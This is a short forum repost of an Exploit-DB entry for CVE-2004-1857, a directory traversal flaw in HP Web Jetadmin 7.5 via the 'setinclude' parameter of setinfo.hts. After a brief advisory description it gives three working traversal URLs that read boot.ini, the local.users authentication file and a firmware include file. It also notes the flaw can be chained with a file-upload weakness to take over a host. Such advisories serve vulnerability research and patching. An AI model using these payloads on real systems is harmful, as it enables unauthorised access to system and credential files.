Exploit HP Web Jetadmin 7.5.2456 - setinfo.hts Script Directory Traversal

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
23879
Проверка EDB
  1. Пройдено
Автор
WIREPAIR
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2004-1857
Дата публикации
2004-03-24
Код:
source: https://www.securityfocus.com/bid/9972/info

It has been reported that HP Web JetAdmin may be prone to a directory traversal vulnerability allowing remote attackers to access information outside the server root directory. The problem exists due to insufficient sanitization of user-supplied data passed via the 'setinclude' parameter of 'setinfo.hts' script.

This vulnerability can be combined with HP Web Jetadmin Firmware Update Script Arbitrary File Upload Weakness (BID 9971) to upload malicious files to a vulnerable server in order to gain unauthorized access to a host. 

This issue has been tested with an authenticated account on HP Web Jetadmin version 7.5.2546 running on a Windows platform.

https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini
https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../auth/local.users
https://www.example.com:8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../hpjwja/firmware/printer/test.inc
 
Источник
www.exploit-db.com

Похожие темы